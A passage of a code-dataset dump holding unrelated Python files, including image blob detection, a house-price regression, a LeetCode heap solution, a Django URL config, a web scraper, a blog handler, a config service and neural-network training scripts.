2960),\n \"device_size\": (360, 740),\n \"device_scale_factor\": 4,\n \"mobile\": True,\n\n }\n\n}\n","sub_path":"code/crawling/log_parsing/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"370681066","text":"from SimpleCV import Camera, Display, Image, Color\n\n\ndef checkCircle(img, color):\n\n yellowDist = img.colorDistance(color)\n yellowBin = yellowDist.binarize(50)\n\n circles = yellowBin.findCircle(canny = 10, thresh = 10, distance = 15)\n\n #yellowBin.show()\n\n if not circles:\n return False\n else:\n return True\n\nimg = Image('1.png')\n\n\ndist = img.colorDistance((161, 171, 182))\nbina = dist.binarize()\nmorphed = bina.morphOpen()\n\ninv = bina.invert()\n\nb = morphed.findBlobs()\nobj = b[0].blobImage()\n\nd = obj.show()\n\n#d = bina.morphOpen().show()\n\n#holes = inv.findBlobs()\n\n'''\nholes = img.findBlobs()\n\ni = 1\nfor hole in holes:\n print(str(i))\n if hole.isCircle(0.41):\n print('Hole found!')\n d = hole.hullImage().show()\n i += 1\n\nprint(holes)\n'''\n\n#print(holes[0].isCircle(0.41))\n\n#d = holes[0].hullImage().show()\n\n'''\n#d = holes[0].hullImage().show()\n\nd = holes[0].getFullMaskedImage().show()\nd = (inv - holes[0].getFullMaskedImage()).show()\n'''\n\n#d = bina.show()\n\n'''\nif checkCircle(img, (156.0, 151.0, 34.0)):\n print('Found a yellow circle!')\nelse:\n print('Didn\\'t find a yellow circle :(')\n'''\n\n#yellowDist = img.colorDistance((156.0, 151.0, 34.0))\n#yellowBin = yellowDist.binarize(50)\n\n\n#yellowBin.show()\n\n#d = (img - yellowBin).show()\n\n\n#circles = yellowBin.findCircle(canny = 10, thresh = 10, distance = 15)\n\n#circles.draw(width=4, color= Color.RED)\n#d = yellowBin.show()\n#d = circles[0].show(color = Color.RED)\n\n#print(circles)\n\n#inv.show()\n\n'''\ncircles = inv.findCircle(canny=50,thresh=50,distance=15)\n\nprint(circles)\n\ncircles.draw(width=4)\n\ncircles[0].draw(color=Color.RED, width=4)\n\nd = inv.show()\n'''\n\n#d = inv.dilate().findCorners(maxnum=6, mindistance=30).show()\n#d = inv.show()\n","sub_path":"app/images/detect_piece.py","file_name":"detect_piece.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"316624911","text":"import re\n\n\ndef contains(whole_text, subpart):\n whole_text = normalize_string(whole_text)\n subpart = normalize_string(subpart)\n try:\n return subpart in whole_text\n except:\n return False\n\n\ndef assert_contains(whole_text, subpart):\n whole_text = normalize_string(whole_text)\n subpart = normalize_string(subpart)\n try:\n assert subpart in whole_text\n except:\n assert False\n\n\ndef normalize_string(string):\n string = string.lstrip().rstrip().lower()\n string = re.sub('[,£$!<>\"\"]', '', string)\n return string","sub_path":"support/string_helper.py","file_name":"string_helper.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"151283370","text":"# -*- coding: utf-8 -*-\n#kaggle house-prices-advanced-regression-techniques\nfrom scipy import *\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import OneHotEncoder\nimport warnings\nimport time\n\nwarnings.filterwarnings('ignore')\n\nSTARTTIME = time.time()\n\ndirectory = \"/Users/yumi/Documents/house-prices-advanced-regression-techniques/\"\n\nTRAIN = pd.read_csv(directory+'train.csv')\nTEST = pd.read_csv(directory+'test.csv')\n\nX = TRAIN.copy()\ny = TRAIN['SalePrice']\nX.drop('Id',axis=1,inplace=True)\nX.drop('SalePrice',axis=1,inplace=True)\nprint(\"shape(X): {}, shape(y): {}\".format(shape(X),shape(y)))\n\ndtype_list = array([X[x].dtype for x in X.columns])\nwant_1 = dtype_list == \"float64\"\nwant_2 = dtype_list == \"int64\"\ncols = X.columns[want_1 + want_2]\n\nX = X[cols]\n#X.dropna(axis = 1, inplace = True)\nX.fillna(value = 0, inplace = True) #no dropping allowed!\nprint(\"shape(X): {}, shape(y): {}\".format(shape(X),shape(y)))\n\nX_train, X_test, y_train, y_test = train_test_split(X, y)\n\nlogreg = LinearRegression()\nlogreg.fit(X_train, y_train)\ny_pred = logreg.predict(X_test)\nprint(\"Log Reg Accuracy: {}\".format(logreg.score(X_test, y_test)))\n\nprint(\"Time elapsed; {:.2f}s\".format(time.time()-STARTTIME))\n\nRRR = RandomForestRegressor()\nRRR.fit(X_train, y_train)\ny_pred = RRR.predict(X_test)\nprint(\"Random Forest Accuracy: {}\".format(RRR.score(X_test, y_test)))\n\ncoeff = logreg.coef_ / max(abs(logreg.coef_))\nfeat_imp = RRR.feature_importances_ / max(abs(RRR.feature_importances_))\nplt.plot(coeff,\"-ko\")\nplt.plot(feat_imp,\"-r*\")\nplt.legend([\"LogReg\",\"RdmFst\"])\nplt.grid(\"on\")\nplt.show()\n\nprint(\"Time elapsed; {:.2f}s\".format(time.time()-STARTTIME))","sub_path":"house_prices.py","file_name":"house_prices.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"38395395","text":"import pandas as pd\nimport hdf\nsigs = hdf.read(r\"C:\\Users\\evans\\Dropbox\\Shade\\raw\\sigs.h5\")[0]\nsigs['Name2'][0]\nseed = pd.read_csv(r'C:\\Users\\evans\\Dropbox\\Shade\\database\\seed.txt', sep='\\t', index_col=0)\nseed.columns\nseed_sig = pd.DataFrame()\nfor i in sigs.index:\n temp = seed.loc[seed['genotype'].str.contains(sigs.loc[i, 'Name2'])]\n if not temp.empty:\n temp['anno'] = sigs.loc[i, 'Annotations']\n temp['gene'] = sigs.loc[i, 'Name2']\n seed_sig = pd.concat([seed_sig, temp])\n\nseed_sig.to_csv(r'C:\\Users\\evans\\Dropbox\\Shade\\database\\seed_sig.csv')\n","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"196232542","text":"from datetime import datetime\nfrom dateutil.relativedelta import relativedelta\n\n\"\"\" now = datetime.now()\nyesterday = now.date() - relativedelta(days=10)\nprint(yesterday) \"\"\"\n\n\ndef filter_time(df, days=0):\n last_day = df.index[0].date()\n start_day = last_day - relativedelta(days=days)\n # sort_index() - skips a warning\n df = df.sort_index().loc[start_day:last_day]\n return df\n","sub_path":"L5-stockdash_teacher_alongs/L5.2-dashboard/time_filtering.py","file_name":"time_filtering.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"379230988","text":"# 给定一个非空的整数数组,返回其中出现频率前 k 高的元素。 \n# \n# \n# \n# 示例 1: \n# \n# 输入: nums = [1,1,1,2,2,3], k = 2\n# 输出: [1,2]\n# \n# \n# 示例 2: \n# \n# 输入: nums = [1], k = 1\n# 输出: [1] \n# \n# \n# \n# 提示: \n# \n# \n# 你可以假设给定的 k 总是合理的,且 1 ≤ k ≤ 数组中不相同的元素的个数。 \n# 你的算法的时间复杂度必须优于 O(n log n) , n 是数组的大小。 \n# 题目数据保证答案唯一,换句话说,数组中前 k 个高频元素的集合是唯一的。 \n# 你可以按任意顺序返回答案。 \n# \n# Related Topics 堆 哈希表 \n# 👍 441 👎 0\n\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n\n#绝对不是最快的方法,但是练习了堆的使用\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n from collections import Counter\n import heapq as hq\n lookup = Counter(nums)\n res = []\n heap = []\n for num, freq in lookup.items():\n # 如果堆满了(k个元素)\n if len(heap) == k:\n # 弹出最小频率的元组\n if heap[0][0] < freq:\n hq.heapreplace(heap, (freq, num))\n else:\n hq.heappush(heap, (freq, num))\n while heap:\n res.append(hq.heappop(heap)[1])\n\n return res\n\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"Week_02/[347]前 K 个高频元素.py","file_name":"[347]前 K 个高频元素.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"36412531","text":"from cister.db.views import BaseCisterView\nfrom cister.db.models.cister import DBSession, Fleet\n\nclass FleetView(BaseCisterView):\n\n def __init__(self, request):\n self.request = request\n\n def __call__(self):\n dbsession = DBSession()\n returnvalue = {}\n returnvalue.update(self.request.matchdict)\n fleetid = returnvalue.get('fleetid')\n\n fleet = dbsession.query(Fleet).filter(Fleet.id==fleetid).one()\n\n returnvalue['fleet'] = fleet\n\n return returnvalue\n","sub_path":"cister/db/views/fleet/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"517762771","text":"import numpy as np\nimport cv2\n\ncap=cv2.VideoCapture(0)\n\n#fourcc = cv2.VideoWriter_fourcc(*'XCID')\n#out= cv2.VideoWriter('output.avi', fourcc, 20.0, (640,480))\nout = cv2.VideoWriter('/media/sdcard/timer.avi',cv2.cv.CV_FOURCC('M','J','P','G'), 6.3, (640,480))\n#out = cv2.VideoWriter('output.avi', -1, 20.0, (640,480))\n\n#while(cap.isOpened()):\nfor i in range(1,100):\n\tret, frame = cap.read()\n\tif ret:\n\t\ti=i+1\n\t\tout.write(frame)\n\n#\t\tcv2.imshow('Video Stream', frame)\n\n\telse:\n\t\tbreak\n\ncap.release()\nout.release()\ncv2.destroyAllWindows() \n\n\n\n\n\n","sub_path":"VideoTesting/VideoCapture.py","file_name":"VideoCapture.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"417072376","text":"\"\"\"Neiman Marcus page scrapper\"\"\"\nfrom price_dig import PageParser, PageScrapper\n\nPARSER_OPTIONS = [{\n 'name': 'product_name',\n 'keyword': {\n 'class': 'product-name'\n }\n}, {\n 'name': 'description',\n 'keyword': {\n 'class': \"productCutline\"\n }\n}, {\n 'name': 'product_img',\n 'keyword': {\n 'class': \"img-wrap\"\n }\n}, {\n 'name': 'product_price',\n 'keyword': {\n 'class': \"product-price\"\n }\n}]\n\n\nclass NeimanMarcusParser(PageParser):\n \"\"\"parser for Neiman Marcus pages\"\"\"\n def __init__(self, url):\n super(NeimanMarcusParser, self).__init__(url, options=PARSER_OPTIONS)\n\n\nclass NeimanMarcusScrapper(PageScrapper):\n \"\"\"scrapper class for Neiman Marcus\"\"\"\n def __init__(self, url):\n super(NeimanMarcusScrapper, self).__init__(url, parser=NeimanMarcusParser)\n","sub_path":"neimanmarcus.py","file_name":"neimanmarcus.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"220938204","text":"n = 100\nsum = 0\nstart = 1\nwhile start <= n:\n sum = sum + start\n n -= 1\n # print(n)\n # print(sum)\nelse:\n print(n)\n# flag = 1\n# while (flag): print ('helloworld!')\n# print (\"Good bye!\")\n\nimport random\n# 骰子投掷的随机叔num\nnum = random.randint(1,6)\n# # 输入一个猜测的数字\ntemp = input(\"请输入一个整数:\")\nguess_num = int(temp)\n\nwhile guess_num != num:\n if guess_num > num and guess_num < 7:\n print(\"大了\")\n if guess_num > 6:\n print(\"你傻了,最大才是6\")\n if guess_num < num:\n print(\"小了,继续猜\")\n temp = input(\"继续猜:\")\n guess_num = int(temp)\n# 猜对了游戏结束\nprint(\"猜对了,游戏结束\")","sub_path":"gachascripts/day03/while.py","file_name":"while.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"178281770","text":"\"\"\"movieproject2 URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom movies import views\nfrom movies.user_decorator import login_requied\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^login/$', views.Login, name=\"login\"),\n url(r'^register/$', views.Register, name=\"register\"),\n url(r'^main/$',views.MainPage,name=\"main\"),\n url(r'^checkusername/$',views.check_username,name=\"checkname\"),\n url(r'^$',views.IndexPage,name=\"indexpage\"),\n\n url(r'^mylike/$',views.MylikePage,name=\"mylike\"),\n url(r'^dellike/$',views.DellikePage,name=\"dellike\"),\n url(r'^like/$',views.LikePage,name=\"like\"),\n\n url(r'^logout/$',views.Logout,name=\"logout\"),\n\n]\n","sub_path":"movieproject2/movieproject2/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"264819378","text":"# -*- coding: utf-8 -*- \r\nfrom Cheetah.Template import Template\r\nimport sys\r\nimport os\r\nimport shutil\r\nimport json\r\nimport gettext\r\n\r\ndef GetConf(conf,inputs,outputs):\r\n\toutputs[\"Result\"][\"value\"]=\"\";\r\n\ti = 0\r\n\ttry:\r\n\t\ttmp=json.dumps(conf[inputs[\"section\"][\"value\"]])\r\n\t\toutputs[\"Result\"][\"value\"]=tmp\r\n\texcept:\r\n\t\tconf[\"lenv\"][\"message\"]=\"Error occurs when trying to parse the \"+inputs[\"section\"][\"value\"]+\"section\"\r\n\t\treturn 4\r\n\treturn 3\r\n\r\ndef SaveConf(conf,inputs,outputs):\r\n\ti = 0\r\n\ttry:\r\n\t\tf = open(conf[\"lenv\"][\"cwd\"]+'/main.cfg', 'w')\r\n\t\tfor a in conf:\r\n\t\t\tif a != \"lenv\":\r\n\t\t\t\tif i>0:\r\n\t\t\t\t\tf.write(\"\\n\");\r\n\t\t\t\tf.write(\"[\"+a+\"]\\n\");\r\n\t\t\t\tif a!=inputs[\"section\"][\"value\"]:\r\n\t\t\t\t\tfor b in conf[a]:\r\n\t\t\t\t\t\t#print >> sys.stderr,\"STD[\"+b+\"=\"+conf[a][b]+\"]\\n\"\r\n\t\t\t\t\t\tf.write(b+\"=\"+conf[a][b]+\"\\n\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tfor b in conf[a]:\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tb.index('_label')\r\n\t\t\t\t\t\t\tf.write(b+\"=\"+conf[a][b]+\"\\n\")\r\n\t\t\t\t\t\t\t#print >> sys.stderr,\"STD[\"+b+\"=\"+conf[a][b]+\"]\\n\"\r\n\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\tif inputs.has_key(b):\r\n\t\t\t\t\t\t\t\tf.write(b+\"=\"+inputs[b][\"value\"]+\"\\n\")\r\n\t\t\t\t\t\t\t\t#print >> sys.stderr,\"DIFF[\"+b+\"=\"+inputs[b][\"value\"]+\"]\\n\"\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tf.write(b+\"=\"+conf[a][b]+\"\\n\")\r\n\t\t\t\t\t\t\t\t#print >> sys.stderr,\"STD[\"+b+\"=\"+conf[a][b]+\"]\\n\"\r\n\r\n\t\t\t\ti+=1\r\n\t\toutputs[\"Result\"][\"value\"]=\"done\"\r\n\t\tf.close()\r\n\t\t#print >> sys.stderr, os.path.abspath(os.getcwd())+'/main1.cfg'+\" => \"+os.path.abspath(os.getcwd())+'/main.cfg'\r\n\t\t#shutil.copy(os.path.abspath(os.getcwd())+'/main1.cfg',os.path.abspath(os.getcwd())+'/main.cfg')\r\n\texcept:\r\n\t\t#print >> sys.stderr,\"Error occurs when trying to parse the section\"\r\n\t\t#print >> sys.stderr, inputs[\"section\"][\"value\"]\r\n\t\tconf[\"lenv\"][\"message\"]=\"Error occurs when trying to parse the \"+inputs[\"section\"][\"value\"]+\"section\"\r\n\t\treturn 4\r\n\treturn 3\r\n\r\n\r\ndef display1(conf,inputs,outputs):\r\n\t#print >> sys.stderr, conf\r\n\toutputs[\"Result\"][\"value\"]='''\r\n

Configuration

\r\n\r\n
\\n'''\r\n\ti=0\r\n\tfor a in conf:\r\n\t\tif a!='lenv':\r\n\t\t\ti=i+1\r\n\t\t\toutputs[\"Result\"][\"value\"]+='''\r\n \r\n'''\r\n\t\r\n\toutputs[\"Result\"][\"value\"]+='''\r\n
\r\n \r\n
'''\r\n\ttextarea=['abstract','keywords']\r\n\tfor a in conf:\r\n\t\tif a!='lenv':\r\n\t\t\toutputs[\"Result\"][\"value\"]+='''
\r\n\t\\n'''\r\n\t\t\tfor b in conf[a]:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tb.index('_label')\r\n\t\t\t\texcept:\r\n\t\t\t\t\toutputs[\"Result\"][\"value\"]+='''\r\n\t \r\n\t \r\n\t \r\n\t \r\n'''\r\n\t\t\toutputs[\"Result\"][\"value\"]+='''\r\n\t
'''\r\n\t\t\t\t\tif conf[a].has_key(b+\"_label\"):\r\n\t\t\t\t\t\toutputs[\"Result\"][\"value\"]+=conf[a][b+\"_label\"]\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\toutputs[\"Result\"][\"value\"]+=b.title()\r\n\t\t\t\t\toutputs[\"Result\"][\"value\"]+='''\r\n:'''\r\n\t\t\t\t\t#print >> sys.stderr,\" Result Name \"+a+\" \"+b+\" \"+conf[a][b],textarea\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\ttextarea.index(b)\r\n\t\t\t\t\t\toutputs[\"Result\"][\"value\"]+=''''''\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\toutputs[\"Result\"][\"value\"]+=''''''\r\n\t\t\t\t\toutputs[\"Result\"][\"value\"]+='''
\r\n
\r\n'''\r\n\toutputs[\"Result\"][\"value\"]+='''\r\n
\r\n
'''\r\n\treturn 3\r\n\r\ndef display(conf,inputs,outputs):\r\n\tnameSpace = {'conf': conf,'inputs': inputs, 'outputs': outputs}\r\n\tt = Template(file=conf[\"lenv\"][\"cwd\"]+\"/configuration/display.html\",searchList=nameSpace)\r\n\toutputs[\"Result\"][\"value\"]=t.__str__()\r\n\treturn 3\r\n","sub_path":"mapmint-services/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"32371158","text":"#!/usr/bin/env python \n#-*- coding:utf-8 _*- \n\"\"\"\n@author: HJK \n@file: env.py \n@time: 2019-01-08\n\n全局变量\n\n\"\"\"\nimport logging\n\nFAKE_HEADERS = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', # noqa\n 'Accept-Charset': 'UTF-8,*;q=0.5',\n 'Accept-Encoding': 'gzip,deflate,sdch',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0', # noqa\n 'referer': 'https://www.google.com'\n}\n\nIOS_USERAGENT = 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1'\n\n\n# 日志\nLOG_LEVEL = logging.DEBUG\nLOG_FILE = None\n\ndef init_option():\n # 命令行参数,写到函数里防止被意外初始化\n global OPTS\n OPTS = {\n # 自定义来源 -s --source\n 'source': 'qq netease kugou baidu',\n # 自定义数量 -c --count\n 'count': 5,\n # 保存目录 -o --outdir\n 'outdir': '.',\n # 搜索关键字\n 'keyword': '',\n # 显示详情\n 'verbose': False\n }\n\ndef set_option(opt, value):\n OPTS[opt] = value\n\ndef get_option(opt):\n return OPTS.get(opt, '')","sub_path":"glovar.py","file_name":"glovar.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"534220902","text":"import asyncio\nfrom loguru import logger\n\nfrom core.apis.erudite import Erudite\nfrom core.apis.drive import Drive\nfrom core.gmail import alert_async\n\n\ndef get_offline(records: list) -> list:\n new_records = [record for record in records if record.get(\"type\") == \"Offline\" or record.get(\"type\") == \"Autorecord\"]\n if len(new_records) > 0:\n logger.info(\"Offline records older than needed date found\")\n return new_records\n else:\n logger.warning(\"No offline records older than needed date found\")\n return []\n\n\n@logger.catch\n@alert_async\nasync def main():\n erudite = Erudite()\n drive = Drive()\n\n records = await erudite.get_needed_records()\n offline_records = get_offline(records)\n logger.info(offline_records)\n\n tasks = []\n for record in offline_records:\n tasks.append(erudite.delete_record(record.get(\"id\")))\n tasks.append(drive.delete_video(record.get(\"url\")))\n\n await asyncio.gather(*tasks)\n\n logger.info(\"All needed records deleted\")\n\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n","sub_path":"delete_old_records/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"392212946","text":"import torch\n\nfrom pysnn.network import SNNNetwork\n\nfrom evolutionary.utils.utils import randomize_env\n\n\ndef evaluate(valid_objectives, config, envs, h0, individual):\n # Keep track of all possible objectives\n objectives = {obj: 0.0 for obj in valid_objectives}\n\n for h, env in zip(h0, envs):\n # Reset network and env\n if isinstance(individual[0], SNNNetwork):\n individual[0].reset_state()\n obs = env.reset(h0=h)\n done = False\n spikes = 0\n\n while not done:\n # Step the environment\n obs = torch.from_numpy(obs)\n action = individual[0].forward(obs.view(1, 1, -1))\n action = action.numpy()\n obs, _, done, _ = env.step(action)\n # Increment number of spikes each step\n if isinstance(individual[0], SNNNetwork):\n spikes += (\n individual[0].neuron1.spikes.sum().item()\n + individual[0].neuron2.spikes.sum().item()\n if individual[0].neuron1 is not None\n else individual[0].neuron2.spikes.sum().item()\n )\n\n # Increment other scores\n # Time to land, final height and final velocity\n if env.t >= env.max_t or env.state[0] >= env.MAX_H:\n objectives[\"time to land\"] += 100.0\n objectives[\"time to land scaled\"] += 100.0\n objectives[\"final velocity\"] += 10.0\n objectives[\"final velocity squared\"] += 10.0\n objectives[\"final height\"] += 10.0\n else:\n objectives[\"time to land\"] += env.t - config[\"env\"][\"settle\"]\n objectives[\"time to land scaled\"] += (env.t - config[\"env\"][\"settle\"]) / h\n objectives[\"final velocity\"] += abs(env.state[1])\n objectives[\"final velocity squared\"] += env.state[1] ** 2\n objectives[\"final height\"] += env.state[0]\n\n # Spikes divided by real time to land, because we don't want to overly stimulate\n # too fast landings\n objectives[\"spikes\"] += spikes / (env.t - config[\"env\"][\"settle\"])\n\n # Select appropriate objectives\n # List, so order is guaranteed\n return [objectives[obj] / len(h0) for obj in config[\"evo\"][\"objectives\"]]\n","sub_path":"evolutionary/evaluate/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"144452734","text":"import seaborn as sns\r\nfrom Bio import SeqIO\r\n\r\n\r\ndef how_distributed(your_fasta):\r\n \"\"\"\r\n creates a histogram and fit a kernel density estimate for distribution of lines' length in fasta file\r\n :param your_fasta: full path\r\n :return: none\r\n \"\"\"\r\n u = list(SeqIO.parse(your_fasta, 'fasta'))\r\n app = []\r\n for line in u:\r\n app.append(len(line))\r\n sns.distplot(app)\r\n \r\n","sub_path":"ДЗ№10/10..2.py","file_name":"10..2.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"571411358","text":"#newpost.py\n\"\"\"Contains class defination for handler class NewPostHandler.\"\"\"\n\nfrom blog import BlogHandler\nfrom models.post import POST\nfrom models.comment import COMMENT\n\n\nclass NewPostHandler(BlogHandler):\n \"\"\"Handler for NEW-POST page which allows users to create\n new blog posts.\"\"\"\n\n def get(self):\n \"\"\"Renders NEW-POST page if user has logged in otherwise\n renders SIGN-IN page.\"\"\"\n\n if self.user:\n self.render(\"newpost.html\",\n username = self.user.username,\n page_title = \"NEW-POST\")\n else:\n self.redirect(\"/signin\")\n\n def post(self):\n \"\"\"Validates the posted blog post's form information for\n errors and accordingly creates the appropriate entities\n and redirects the page.\"\"\"\n\n post_subject = self.request.get(\"subject\")\n post_content = self.request.get(\"content\")\n\n if post_subject and post_content:\n post = POST.create_post(user_id = str(self.user.key().id()),\n post_subject = post_subject,\n post_content = post_content)\n post.put()\n self.redirect(\"/post/\" + str(post.key().id()))\n else :\n self.render(\"newpost.html\",\n err_msg = \"Both SUBJECT and CONTENT can't be left empty.\",\n post_subject = post_subject,\n post_content = post_content,\n page_title = \"NEW-POST\")\n","sub_path":"handlers/newpost.py","file_name":"newpost.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"142429371","text":"import matplotlib\nmatplotlib.use(\"TkAgg\")\nimport os\nimport pandas as pd\nimport numpy as np\nimport torch\nimport torch.optim as optim\nimport time\nimport matplotlib.pyplot as plt\nimport sys\nsys.path.append(os.path.join(\"..\", \"..\"))\nfrom torchid.ssfitter import NeuralStateSpaceSimulator\nfrom torchid.ssmodels import CTSNeuralStateSpaceModel\n\n\nif __name__ == '__main__':\n\n # Set seed for reproducibility\n np.random.seed(0)\n torch.manual_seed(0)\n\n # Overall parameters\n num_iter = 40000 # gradient-based optimization steps\n seq_len = 256 # subsequence length m\n batch_size = 32 # batch size\n alpha = 0.5 # fit/consistency trade-off constant\n lr = 1e-4 # learning rate\n test_freq = 100 # print message every test_freq iterations\n\n # Load dataset\n df_data = pd.read_csv(os.path.join(\"data\", \"dataBenchmark.csv\"))\n u_id = np.array(df_data[['uEst']]).astype(np.float32)\n y_id = np.array(df_data[['yEst']]).astype(np.float32)\n ts = df_data['Ts'][0].astype(np.float32)\n time_exp = np.arange(y_id.size).astype(np.float32)*ts\n\n x_est = np.zeros((time_exp.shape[0], 2), dtype=np.float32)\n x_est[:, 0] = np.copy(y_id[:, 0])\n\n # Hidden state variable\n x_hidden_fit = torch.tensor(x_est, dtype=torch.float32, requires_grad=True) # hidden state is an optimization variable\n y_fit = y_id\n u_fit = u_id\n time_fit = time_exp\n\n # Setup neural model structure\n ss_model = CTSNeuralStateSpaceModel(n_x=2, n_u=1, n_feat=64, ts=ts)\n nn_solution = NeuralStateSpaceSimulator(ss_model)\n\n # Setup optimizer\n params_net = list(nn_solution.ss_model.parameters())\n params_hidden = [x_hidden_fit]\n optimizer = optim.Adam([\n {'params': params_net, 'lr': lr},\n {'params': params_hidden, 'lr': lr},\n ], lr=10*lr)\n\n # Batch extraction funtion\n def get_batch(batch_size, seq_len):\n\n # Select batch indexes\n num_train_samples = u_fit.shape[0]\n batch_start = np.random.choice(np.arange(num_train_samples - seq_len, dtype=np.int64), batch_size, replace=False) # batch start indices\n batch_idx = batch_start[:, np.newaxis] + np.arange(seq_len) # batch samples indices\n #batch_idx = batch_idx.T # transpose indexes to obtain batches with structure (m, q, n_x)\n\n # Extract batch data\n batch_t = torch.tensor(time_fit[batch_idx])\n batch_x0_hidden = x_hidden_fit[batch_start, :]\n batch_x_hidden = x_hidden_fit[[batch_idx]]\n batch_u = torch.tensor(u_fit[batch_idx])\n batch_y = torch.tensor(y_fit[batch_idx])\n\n return batch_t, batch_x0_hidden, batch_u, batch_y, batch_x_hidden\n\n # Scale loss with respect to the initial one\n with torch.no_grad():\n batch_t, batch_x0_hidden, batch_u, batch_y, batch_x_hidden = get_batch(batch_size, seq_len)\n batch_x_sim = nn_solution.f_sim_multistep(batch_x0_hidden, batch_u)\n #traced_nn_solution = torch.jit.trace(nn_solution, (batch_x0_hidden, batch_u))\n err_init = batch_x_sim - batch_y\n scale_error = torch.sqrt(torch.mean(err_init**2, dim=(0, 1)))\n\n LOSS_TOT = []\n LOSS_FIT = []\n LOSS_CONSISTENCY = []\n start_time = time.time()\n # Training loop\n\n #scripted_nn_solution = torch.jit.script(nn_solution)\n for itr in range(0, num_iter):\n\n optimizer.zero_grad()\n\n # Simulate\n batch_t, batch_x0_hidden, batch_u, batch_y, batch_x_hidden = get_batch(batch_size, seq_len)\n batch_x_sim = nn_solution.f_sim_multistep(batch_x0_hidden, batch_u) # 52 seconds RK | 13 FE\n #batch_x_sim = nn_solution(batch_x0_hidden, batch_u) # 70 seconds RK | 13 FE\n #batch_x_sim = scripted_nn_solution(batch_x0_hidden, batch_u) # 71 seconds RK | 13 FE\n\n # Compute fit loss\n err_fit = batch_x_sim[:, :, [0]] - batch_y\n err_fit_scaled = err_fit/scale_error[0]\n loss_fit = torch.mean(err_fit_scaled**2)\n\n # Compute consistency loss\n err_consistency = batch_x_sim - batch_x_hidden\n err_consistency_scaled = err_consistency/scale_error\n loss_consistency = torch.mean(err_consistency_scaled**2)\n\n # Compute trade-off loss\n loss = alpha*loss_fit + (1.0-alpha)*loss_consistency\n\n # Statistics\n 